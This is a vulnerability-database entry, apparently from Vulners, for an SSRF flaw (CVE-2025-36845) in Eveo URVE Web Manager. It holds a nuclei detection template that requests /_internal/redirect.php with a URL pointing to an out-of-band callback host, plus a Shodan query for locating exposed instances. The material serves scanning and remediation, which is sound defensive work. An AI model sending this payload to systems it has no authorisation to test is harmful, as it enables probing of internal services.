Lucene search
K

Eveo URVE Web Manager - Server-Side Request Forgery

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

Eveo URVE Web Manager SSRF via improper URL validation in /internal/redirect.php allows internal requests.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-36845
22 Jul 202500:54
circl
CNNVD
Eveo URVE Web Manager 安全漏洞
21 Jul 202500:00
cnnvd
CVE
CVE-2025-36845
21 Jul 202500:00
cve
Cvelist
CVE-2025-36845
21 Jul 202500:00
cvelist
EUVD
EUVD-2025-22139
3 Oct 202520:07
euvd
EUVD
EUVD-2025-22140
21 Jul 202500:00
euvd
NVD
CVE-2025-36845
21 Jul 202518:15
nvd
OSV
CVE-2025-36845
21 Jul 202518:15
osv
Positive Technologies
PT-2025-30326
21 Jul 202500:00
ptsecurity
RedhatCVE
CVE-2025-36845
23 Jul 202500:57
redhatcve
Rows per page
id: CVE-2025-36845

info:
  name: Eveo URVE Web Manager - Server-Side Request Forgery
  author: DhiyaneshDk
  severity: high
  description: |
    Eveo URVE Web Manager 27.02.2025 contains a server-side request forgery caused by improper validation of URL input in /_internal/redirect.php, letting attackers make requests to internal endpoints, exploit requires crafted URL input.
  impact: |
    Attackers can make requests to internal-only accessible endpoints, potentially exposing sensitive internal services or data.
  remediation: |
    Update to the latest version with SSRF protections or apply input validation to restrict URL requests.
  reference:
    - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-035.txt
    - https://smartoffice.expert/en
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"URVE Web Manager"
  tags: cve,cve2025,eveo,ssrf,oast,oob

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/urve/site/login.html?lang=en"

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'URVE Web Manager')"
          - "status_code == 200"
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/_internal/redirect.php?url=http://{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4b0a00483046022100e8485b0f6e12dfd30ac43130dd20d7059168912b2c8db99550e2d11f32affcfa022100e6d23f89bb6bd11e0a804607ad7b8e2f0048044b1edd544ad3bdc8b9b3311ace:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 3.18.6
EPSS0.0158
SSVC
7